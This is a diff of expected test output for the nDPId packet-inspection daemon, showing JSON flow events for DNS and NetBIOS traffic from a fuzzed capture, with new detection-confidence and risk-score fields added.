-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470361584,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470356585,"flow_last_seen":1120470365590,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470361584,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470356585,"flow_last_seen":1120470365590,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470272927,"flow_last_seen":1120470272927,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"94.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":4,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267925,"flow_last_seen":1120470276933,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470373592,"flow_last_seen":1120470373592,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1120470373592,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470373592,"pkt":"ADBUADRWAODtAW69CABFAABEav4AAIARTFfAqAECwKgBAQrXADUAMHoFquIAAAABAAAAAAAIATEBMAEwAzEyNwdpbi1hUWSWBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470373592,"flow_last_seen":1120470373592,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-aqd?.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470373592,"flow_last_seen":1120470373592,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-aqd?.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1120470373593,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470373593,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CtcAR1yBquKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470373593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
-00757{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470373593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00874{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284936,"flow_last_seen":1120470284936,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":117,"dst_port":2769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470385615,"flow_last_seen":1120470385615,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1120470385615,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470385615,"pkt":"ADBUADRWAODtAW69CABFAABIawQAAIARTE3AqAECwKgBAQrYADUANPsJLuMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470385615,"flow_last_seen":1120470385615,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470385615,"flow_last_seen":1120470385615,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1120470386610,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470386610,"pkt":"ADBUADRWAODtAW69CABFAABIawUAAKARTEzAqAECwKgBAQrYADUANEcJLuMBAAABAAAAAAAABV9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470385615,"flow_last_seen":1120470386610,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470386610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00875{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470385615,"flow_last_seen":1120470386610,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470386610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":392,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470388613,"pkt":"ADBUADSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":392,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1120470390616,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470390616,"pkt":"ADBUADRWAODtAW69CABFAABIawsAAIARTEbAqAECwKgBAQrYADUANPsJLuMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470385615,"flow_last_seen":1120470390616,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470390616,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1120470398219,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470385615,"flow_last_seen":1120470390616,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470390616,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1120470398219,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470398219,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470398219,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1120469540839,"flow_last_seen":1120470352381,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1992,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470398219,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
